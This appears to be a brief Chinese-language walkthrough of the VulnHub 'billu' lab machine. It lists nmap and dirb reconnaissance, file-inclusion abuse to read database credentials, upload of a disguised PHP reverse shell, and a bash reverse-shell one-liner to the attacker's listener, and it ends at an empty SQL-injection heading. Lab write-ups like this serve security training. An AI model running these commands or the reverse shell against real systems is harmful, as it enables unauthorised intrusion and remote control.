靶机下载链接:https://download.vulnhub.com/billu/
1.查询网段
nmap -sP 192.168.47.1/24
2.查询详细服务
nmap -O -sV 192.168.47.164
3.查看80页面
4.dirb目录扫描;查看备份文件
dirb http://192.168.47.164
dirb http://192.168.47.164 -X .bak
5.应为是php编写的,所以扫描一下.php后缀的文件
dirb http://192.168.47.164 -X .php
6.dirbbuster字典扫描
7.有用信息
8.test是一个文件包含页面;而且是post提交
9.利用包含页面查看源码 c.php
有数据库连接地址,密码、用户、数据库名
登录mysql,里面有一个用户
尝试登录;登录成工里面有一个上传页面,和一个查看图片的页面
这是个php反弹shell;修改了图片特征码
上传成功
http://192.168.47.164/panel.php有一个文件包含漏洞
load参数=add/show;或者<>都会执行include函数
利用文件包含调用代码;kali建立监听,拿取shell
提权:查看版本号:
cat /etc/issue
第二种方法:
使用nc监听
上传一句话命令执行代码
可以执行命令漏洞
burp抓包执行nc反弹语句
echo “bash -i >&/dev/tcp/192.168.47.167/4444 0>&1” |bash 要进行url编码
反弹shell成功
sql注入: